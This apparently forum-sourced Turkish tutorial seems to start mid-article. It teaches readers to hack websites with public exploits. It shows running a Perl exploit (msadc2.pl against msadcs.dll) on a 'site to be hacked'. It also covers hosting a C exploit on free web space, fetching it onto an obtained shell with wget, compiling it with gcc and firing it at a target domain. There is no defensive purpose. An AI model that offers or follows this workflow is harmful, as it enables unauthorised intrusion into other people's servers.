Exploitler Nedir, Nereden Bulunur ve Nasıl Kullanılır?

       "perl a.pl -h www.hackleneceksite.net "  yazın exploitin özelliklerine göre bundan sonra işlemlerinizi yapabilirsiniz örneğin msadc2.pl exploiti ile bu komutu veridğinizde sitede msadcs.dll açığı varsa önünüze bir dizin gelcek bundan sonra bazı komutlarla siteyi hackleyebiliyorsunuz .

              2-Shellde Exploit Derleme

       Exploit derlemek için bir şekilde shell temin ettiniz diyelim .Ve bir tanede site adresi.Yukarda anlattığım yol ile sitenin sistemini bulduktan sonra yukardaki adreslerden c dili ile yazılmış exploitimizi edindik. Şimdi bu şekilde exploiti bulduk diyelim hemen bu exploiti pcmize indiriyoruz . bundan
sonra exploiti kullanmak için kendimize bir bedava alan veren serverlardan bir tane alan almalıyız . çünkü indirdiğimiz exploiti sürekli kullanmak için kendimize ait bir yerde bulunması iyi olacaktır .diyelimki bulduğunuz exploit super.c bunu mynetten aldığımız hosta attık diyelim . şunu belirteyim kesinlikle adını değiştirmeyin bulduğunuz sitede adı neyse o şekilde pcnize kaydedin . şimdi hostada exploiti attık . bundan sonraki aşamalar kolay . hemen shelle geçelim linuxunuz varsa linuxa paralı shelliniz varsa onuda winden açın bunuda putty programı ile yapabilirsiniz . iki şekilden biri ile shell e geçtiniz diyelim şimdi burda yapmanız gereken exploiti öncelikle pcnize çekmek aslında exploiti çekmeden pcnizin ana dizininde bulundursanız yani masaüstünde bulundurarak kullanabilirsiniz fakat kullacağınız exploit sayısı arttıkca masaüstünüz dolar ayrıca exploitleri çektikten sonra onları derlemek zorundasınız . neyse ben size hosttan exploit. çekerek anlatacağım . şimdi shelle girdiğinizde önünüze shelldeki haklarınıza göre oturum açılır linuxda root shellden açtıysanız root shell yazar zaten neyse shelle girdiğinizde fazla zaman kaybetmeden exploiti çekelim yüklediğimiz yerden bu exploiti pcmize çekmek için şu komutu kullanıyoruz.

 "wget http://site adresi/exploid.c"  komutu ile exploistsi pcmize çekiyoruz.

       Fakat bu halde exploit işimize yaramaz çünkü kapalı durumdadır hani netten zipli bir dosyayı çekerizde açmadan kullanamayız ya işte exploitleride kullanmak için açmalıyız bu iş içinde gcc compilerleri kullanırız bu bir programdır ve hemen hemen her shellde vardır fakat ücretsiz shellerde bu uygulama kapatılmıştır . Neyse şimdi çektiğimiz exploiti pcmizdedir bunu normalde göremeyiz fakat shellde   "ls"  yazarak onu ve masaüstündeki uygulamaları görebilirsiniz . şimdi sıra geldi exploitimizi açmaya bunuda şu komutu kullanarak yapacağız;

       "gcc -o exploid adı exploidadı.c" şeklinde exploiti kullanılabilir hale getiriyoruz. Burada bir şeyi açıklamak istiyorum komutu yazarken -o de gördüğünüz - çizginin yanındaki şey sıfır değil o harfi bunu sıfır yazarsanız exploiti derleyemezsiniz birde gcc -o exploid adı exploidadı.c komutunda 1. yere exploitin uzantısız adını yazıyoruz yani exploitin adı spk.c ise siz birinci yere spk yazmalısınız boşluk bıraktıkdan sonra ikinci yere ise spk.c yazın aslında buraya farklı bir isim yazabilirsiniz yani kendi istediğiniz bir ismi fakat genelde bu şekilde yapınca gcc compiler hata veriyor siz yinede exploiti asıl adıyla derleyin derledikten sonra ls komutunu verdiğiniz örnek olarak verdiğim exploitin hem derlenmişi hemde derlenmemişi gözükür yani spk ve spk.c gözükecektir . bizim kullancağımız spk.c dir .Şimdi burdan sonrası çok kolay şimdi explioti kullanmaya geldi sıra komut yerine  " ./exploidin adını" yazıyoruz fakat burda c uzantısını yazmıyoruz ve şu şekilde komutumuzu veriyoruz ./spk bu komuttan sonra önümüze exploiti nasıl kullancağımızla ilgili bilgiler geliyor bundan sonra exploiti bir sitede denemek onuda şu komutala yapıyoruz

       "./exploid adı -h www.a.com " bu komutla exploiti deniyoruz şayet çalışırsa artık size kalmış sitede yapabilcekleriniz exploitin özelliklerine bağlı. direkmen bir exploit ile siteyi yıkarım sanmayın öncelikle exploit kendi hafızasındaki açığı deneyecektir bu açık varsa sizi sitenin ana dizinine götürecek zaten açık yoksa bir şey yapamasınız .